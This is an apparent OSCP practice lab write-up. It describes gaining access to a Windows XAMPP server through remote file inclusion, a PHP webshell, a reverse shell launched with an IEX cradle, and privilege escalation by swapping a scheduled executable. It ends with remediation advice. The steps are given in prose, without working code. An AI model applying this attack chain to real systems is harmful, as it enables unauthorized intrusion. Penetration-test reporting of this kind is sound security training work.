OSCP Practice RFI + PHP to RCE

Stewart Beam

3 Oct, 2022

OSCP Practice RFI + PHP to RCE

OSCP Practice RFI + PHP to RCE

High Level Summary

During review of this device, port 4443 and 8080 were found to be running an Apache web server. Both ports had the default XAMPP dashboard displayed. Fuzzing for other files or directories lead to the discovery of a directory /site. From the URL, it looked like the site should be tested for LFI / RFI.

Using the windows host file, we were able to verify the ability to read some local files. With a nc listener, we were able to verify that we could load remote files.

Once we knew that we could include remote files, we tested command execution with a PHP webshell. The webshell provided the ability to get a callback from the host with an IEX cradle.

Once on the remote system, we identified an executable in the C:\Backup directory that was running on a schedule. Our user had write access to this file, and we were able to replace it with a new executable to get a callback as an administrative level user.

Recommendations

Use the web server to disable inclusion of remote files. In PHP this can be done by setting “allow_url_fopen” and “allow_url_include” to off.

Additionally, use a framework for PHP development. Normally, the PHP framework will have a built in function that limits the file loaded only to the file specifically needed.

Finally, low level users should not have write permissions to an executable ran on a timer as an administrative user.

Initial Access with the RFI

After fuzzing the web server, we found the /site directory. It looked like this when it loaded.

This was a Windows machine, so we used Burp to test for LFI with the hosts file.

After identifying the site was vulnerable, a nc listener was used to verify if we could include a URL.

RCE with a WebShell

Using a python web server, a php webshell was hosted, and we were able to verify command execution.

Next, the RCE was used to call a reverse shell with a simple IEX cradle.

Once on the machine with an interactive shell, we identified a Backup directory that had multiple files in it. Reading the content identified, that the backup was being ran on a schedule.

Our user had write permissions on the executable file, so we renamed it, and replaced it with a malicious executable to get a callback to our system.